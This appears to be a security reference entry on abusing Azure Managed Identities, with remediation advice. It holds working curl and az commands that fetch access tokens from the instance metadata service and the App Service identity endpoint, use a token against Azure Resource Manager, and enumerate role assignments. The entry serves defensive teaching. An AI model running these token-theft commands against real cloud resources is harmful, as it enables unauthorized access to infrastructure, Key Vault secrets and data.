Managed Identity Abuse

Description

Managed Identities (system- or user-assigned) provide tokens to Azure resources via the Instance Metadata Service (IMDS) or platform endpoints. Over‑privileged identities, exposed token endpoints, or SSRF that reaches IMDS allow attackers to obtain access tokens for Azure Resource Manager, Microsoft Graph, Key Vault, or custom resources and access downstream data or modify infrastructure.

Examples

Fetch MI Token (On VM/Function)

curl -H "Metadata:true" \
  'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F'

Use token to query subscriptions:

curl -H "Authorization: Bearer <token>" https://management.azure.com/subscriptions?api-version=2020-01-01

Enumerate Role Assignments for the MI

# Use principal/object ID of the managed identity
az role assignment list --assignee <principal-id> --all -o table

App Service/Function Identity Endpoint

On App Service, tokens are available from the local identity endpoint with a secret header:

curl "$IDENTITY_ENDPOINT?api-version=2019-08-01&resource=https://vault.azure.net" \
  -H "X-IDENTITY-HEADER: $IDENTITY_HEADER"

Remediation

  1. Scope roles to least privilege
    • Avoid Owner/Contributor at subscription/management group; grant resource‑scoped roles only as needed.
  2. Protect token endpoints and audiences
    • Block SSRF to IMDS with egress filtering; validate token audiences server‑side; use user‑assigned MI with narrower blast radius.
  3. Network and platform controls
    • Prefer private endpoints and VNet integration; restrict App Service SCM/public endpoints; rotate credentials for downstream services and monitor token use.